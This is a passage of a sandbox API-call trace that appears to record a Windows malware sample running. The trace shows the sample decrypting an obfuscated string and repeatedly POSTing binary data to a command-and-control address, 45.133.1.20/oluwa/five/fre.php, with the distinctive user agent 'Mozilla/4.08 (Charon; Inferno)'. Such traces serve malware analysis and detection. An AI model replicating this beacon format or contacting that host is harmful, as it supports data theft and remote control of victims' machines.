(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.255] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.255] GetProcessHeap () returned 0x6a0000 [0252.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0252.255] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.256] GetProcessHeap () returned 0x6a0000 [0252.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0252.257] GetProcessHeap () returned 0x6a0000 [0252.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.257] GetProcessHeap () returned 0x6a0000 [0252.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0252.260] GetProcessHeap () returned 0x6a0000 [0252.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0252.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0252.278] GetProcessHeap () returned 0x6a0000 [0252.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.279] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0252.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.280] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.282] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.282] GetProcessHeap () returned 0x6a0000 [0252.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.283] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0252.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.290] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0252.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.293] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0252.293] GetProcessHeap () returned 0x6a0000 [0252.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.295] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0252.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.296] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0252.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.297] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0252.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.298] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0252.298] GetProcessHeap () returned 0x6a0000 [0252.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0252.298] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0252.298] GetProcessHeap () returned 0x6a0000 [0252.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0252.298] socket (af=2, type=1, protocol=6) returned 0x858 [0252.299] connect (s=0x858, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0252.327] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0252.327] GetProcessHeap () returned 0x6a0000 [0252.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0252.327] GetProcessHeap () returned 0x6a0000 [0252.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0252.328] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.329] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.329] GetProcessHeap () returned 0x6a0000 [0252.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba678 [0252.329] GetProcessHeap () returned 0x6a0000 [0252.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.330] GetProcessHeap () returned 0x6a0000 [0252.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0252.330] GetProcessHeap () returned 0x6a0000 [0252.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0252.331] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.331] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.331] GetProcessHeap () returned 0x6a0000 [0252.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0252.331] GetProcessHeap () returned 0x6a0000 [0252.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.332] send (s=0x858, buf=0x6bd460*, len=242, flags=0) returned 242 [0252.354] send (s=0x858, buf=0x6bb998*, len=159, flags=0) returned 159 [0252.354] GetProcessHeap () returned 0x6a0000 [0252.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0252.354] recv (in: s=0x858, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0252.420] GetProcessHeap () returned 0x6a0000 [0252.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0252.421] GetProcessHeap () returned 0x6a0000 [0252.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0252.422] GetProcessHeap () returned 0x6a0000 [0252.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba678 | out: hHeap=0x6a0000) returned 1 [0252.422] GetProcessHeap () returned 0x6a0000 [0252.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0252.423] closesocket (s=0x858) returned 0 [0252.424] GetProcessHeap () returned 0x6a0000 [0252.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0252.424] GetProcessHeap () returned 0x6a0000 [0252.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.425] GetProcessHeap () returned 0x6a0000 [0252.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0252.425] GetProcessHeap () returned 0x6a0000 [0252.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0252.426] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1588) returned 0x858 [0252.429] Sleep (dwMilliseconds=0xea60) [0252.431] GetProcessHeap () returned 0x6a0000 [0252.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0252.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0252.463] GetProcessHeap () returned 0x6a0000 [0252.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0252.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.464] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0252.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.476] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.477] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.477] GetProcessHeap () returned 0x6a0000 [0252.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0252.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.479] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0252.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.480] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0252.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.481] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0252.481] GetProcessHeap () returned 0x6a0000 [0252.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.482] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.484] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.485] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.487] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.487] GetProcessHeap () returned 0x6a0000 [0252.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0252.487] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.487] GetProcessHeap () returned 0x6a0000 [0252.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0252.488] GetProcessHeap () returned 0x6a0000 [0252.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.489] GetProcessHeap () returned 0x6a0000 [0252.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0252.489] GetProcessHeap () returned 0x6a0000 [0252.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0252.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.496] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0252.504] GetProcessHeap () returned 0x6a0000 [0252.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.505] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0252.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.506] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.507] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.507] GetProcessHeap () returned 0x6a0000 [0252.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.509] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0252.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.510] CryptDestroyKey (hKey=0x6ad020) returned 1 [0252.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.511] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0252.511] GetProcessHeap () returned 0x6a0000 [0252.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.512] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0252.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.513] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0252.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.514] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0252.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.515] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0252.515] GetProcessHeap () returned 0x6a0000 [0252.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0252.515] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0252.515] GetProcessHeap () returned 0x6a0000 [0252.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0252.515] socket (af=2, type=1, protocol=6) returned 0x85c [0252.516] connect (s=0x85c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0252.541] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0252.541] GetProcessHeap () returned 0x6a0000 [0252.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0252.541] GetProcessHeap () returned 0x6a0000 [0252.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0252.541] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.542] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.542] GetProcessHeap () returned 0x6a0000 [0252.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba678 [0252.542] GetProcessHeap () returned 0x6a0000 [0252.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.543] GetProcessHeap () returned 0x6a0000 [0252.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0252.543] GetProcessHeap () returned 0x6a0000 [0252.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0252.544] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.544] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.544] GetProcessHeap () returned 0x6a0000 [0252.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0252.544] GetProcessHeap () returned 0x6a0000 [0252.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.545] send (s=0x85c, buf=0x6bd460*, len=242, flags=0) returned 242 [0252.545] send (s=0x85c, buf=0x6bb998*, len=159, flags=0) returned 159 [0252.545] GetProcessHeap () returned 0x6a0000 [0252.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0252.546] recv (in: s=0x85c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0252.624] GetProcessHeap () returned 0x6a0000 [0252.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0252.626] GetProcessHeap () returned 0x6a0000 [0252.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0252.627] GetProcessHeap () returned 0x6a0000 [0252.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba678 | out: hHeap=0x6a0000) returned 1 [0252.627] GetProcessHeap () returned 0x6a0000 [0252.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0252.628] closesocket (s=0x85c) returned 0 [0252.628] GetProcessHeap () returned 0x6a0000 [0252.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0252.628] GetProcessHeap () returned 0x6a0000 [0252.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.629] GetProcessHeap () returned 0x6a0000 [0252.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0252.629] GetProcessHeap () returned 0x6a0000 [0252.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0252.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x158c) returned 0x85c [0252.646] Sleep (dwMilliseconds=0xea60) [0252.648] GetProcessHeap () returned 0x6a0000 [0252.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0252.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.651] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.660] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0252.668] GetProcessHeap () returned 0x6a0000 [0252.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.670] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0252.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.676] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.677] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.677] GetProcessHeap () returned 0x6a0000 [0252.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.679] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0252.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.680] CryptDestroyKey (hKey=0x6ad520) returned 1 [0252.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.682] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0252.682] GetProcessHeap () returned 0x6a0000 [0252.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.684] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.685] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.687] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.687] GetProcessHeap () returned 0x6a0000 [0252.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0252.687] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, 